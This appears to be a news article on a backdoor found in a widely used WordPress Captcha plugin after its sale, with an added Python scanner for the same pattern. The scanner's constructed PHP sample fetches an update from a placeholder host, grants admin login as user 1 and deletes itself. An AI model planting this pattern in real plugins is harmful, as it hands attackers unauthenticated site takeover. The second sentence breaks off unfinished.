Hidden Backdoor Discovered In WordPress Captcha Plugin Impacts Over 300,000 Websites

Buying popular plugins with a large user base and using them for easy

One such incident occurred recently when the well-known developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

In a blog post published on Tuesday, the security firm WordFence revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin repository.

While reviewing the source code of the Captcha plugin, WordFence researchers found a severe backdoor that could allow the plugin author, or attackers, to remotely gain administrative access to WordPress websites without any authentication.

The plugin was configured to automatically pull an updated "backdoored" version from a remote URL (https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php) after installation from the official WordPress repository, without the site administrator's consent.


This backdoor code was designed to create a login session with administrative privileges for the attacker, in this case the plugin author, allowing them to remotely access any of the 300,000 websites using the plugin without any authentication.

"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself," reads the WordFence blog post. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."

Additionally, the modified code pulled from the remote server is almost identical to the code in the legitimate plugin repository, therefore "triggering the same automatic update process removes all file system traces of the backdoor," making it look as if it was never there and helping the attacker avoid detection.
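Because the self-deleting update leaves no file on disk to examine afterwards, the practical check is to scan a plugin tree before that update fires, looking for the three behaviours described above: a hard-coded user ID (such as 1) handed straight to the WordPress login functions, a file that unlinks itself, and an "update" fetched from a host outside the official wordpress.org repository. The scanner below is an added example written for this page, not WordFence's tooling and not code from the Captcha plugin; the indicator patterns are assumptions derived from the described behaviour, and the two PHP snippets (including the host updates.example.net) are constructed samples rather than the real plugin's source.

```python
"""Static triage for the backdoor pattern described above (added example).

Not WordFence's scanner and not the Captcha plugin's code. The indicators are
assumptions derived from the described behaviour; the PHP snippets at the
bottom are constructed samples, not code from the real plugin.
"""
import re
import sys
from pathlib import Path
from typing import Dict, List

# Assumed indicators, one per described behaviour:
#  - a literal user ID (e.g. 1, the default admin) passed to WordPress's
#    login functions instead of a value produced by a real login flow,
#  - a file that unlinks itself after running,
#  - an "update" fetched from a host outside the official plugin repository.
INDICATORS = {
    "auth_cookie_literal_uid": re.compile(r"wp_set_auth_cookie\s*\(\s*\d+"),
    "current_user_literal_uid": re.compile(r"wp_set_current_user\s*\(\s*\d+"),
    "self_delete": re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
}
# Any http(s) URL; group 1 is the host, checked against the allow-list below.
URL_RE = re.compile(r"""https?://([A-Za-z0-9.-]+)[^\s'"]*""")
OFFICIAL_HOSTS = ("wordpress.org",)  # api./downloads. subdomains are accepted


def _is_official(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in OFFICIAL_HOSTS)


def scan_source(src: str) -> Dict[str, List[str]]:
    """Return {indicator: [matched text, ...]} for one PHP source string."""
    hits: Dict[str, List[str]] = {}
    for name, rx in INDICATORS.items():
        found = [m.group(0) for m in rx.finditer(src)]
        if found:
            hits[name] = found
    remote = [m.group(0) for m in URL_RE.finditer(src) if not _is_official(m.group(1))]
    if remote:
        hits["non_official_url"] = remote
    return hits


def is_suspicious(hits: Dict[str, List[str]]) -> bool:
    """A literal-UID auth cookie or self-deletion is damning on its own.
    wp_set_current_user(<n>) or a non-official URL alone is only flagged
    when paired with another indicator (legitimate cron/CLI code uses both)."""
    if "auth_cookie_literal_uid" in hits or "self_delete" in hits:
        return True
    return len(hits) >= 2


def scan_plugin_dir(plugin_dir: str) -> Dict[str, Dict[str, List[str]]]:
    """Scan every .php file under plugin_dir; return only files with hits."""
    root = Path(plugin_dir)
    report: Dict[str, Dict[str, List[str]]] = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


# Constructed samples (not the real plugin's code; host is a placeholder).
BACKDOORED_SAMPLE = r"""<?php
$update = wp_remote_get('https://updates.example.net/captcha/captcha_pro_update.php');
// ... later, reachable without any capability or nonce check:
wp_set_current_user(1);
wp_set_auth_cookie(1);
@unlink(__FILE__);
"""

CLEAN_SAMPLE = r"""<?php
if ( ! current_user_can( 'manage_options' ) ) {
    wp_die( 'Insufficient permissions' );
}
$resp = wp_remote_post( 'https://api.wordpress.org/plugins/update-check/1.1/', $args );
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python scan.py /path/to/wp-content/plugins/captcha
        for file, hits in scan_plugin_dir(sys.argv[1]).items():
            print(("SUSPICIOUS " if is_suspicious(hits) else "review     ") + file, hits)
    else:
        for label, src in (("backdoored", BACKDOORED_SAMPLE), ("clean", CLEAN_SAMPLE)):
            hits = scan_source(src)
            print(label, "->", "SUSPICIOUS" if is_suspicious(hits) else "clean", hits)
```

Run it against a plugin directory (for example wp-content/plugins/captcha) to get a per-file report; without arguments it scans the two constructed samples. The scoring is deliberately conservative: a literal user ID passed to wp_set_auth_cookie, or a file deleting itself, has no legitimate reason to appear in a plugin, while wp_set_current_user and off-repository URLs do occur in honest code and are only reported in combination.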


The rationale behind adding a backdoor is unclear at the moment, but when someone pays a handsome sum to buy a popular plugin with a large user base, there must be a strong motive behind it.

In similar cases, we have seen organized cyber gangs acquire popular plugins and applications in order to stealthily infect their large user bases with malware, adware, and spyware.

While trying to establish the exact identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named "Stacy Wellington" using the email address "scwellington[at]hotmail.co.uk."

Using a reverse whois lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

What's interesting? The plugins served from all of the above-mentioned domains registered to that user contained the same backdoor code that the WordFence researchers found in Captcha.

WordFence has teamed up with WordPress to patch the affected version of the Captcha plugin and to block the author from publishing updates, so website administrators are strongly advised to replace their copy of the plugin with the latest official Captcha version 4.4.5.

WordFence has promised to release in-depth technical details on how the backdoor installation and execution work, along with a proof-of-concept exploit, after 30 days so that admins have enough time to patch their websites.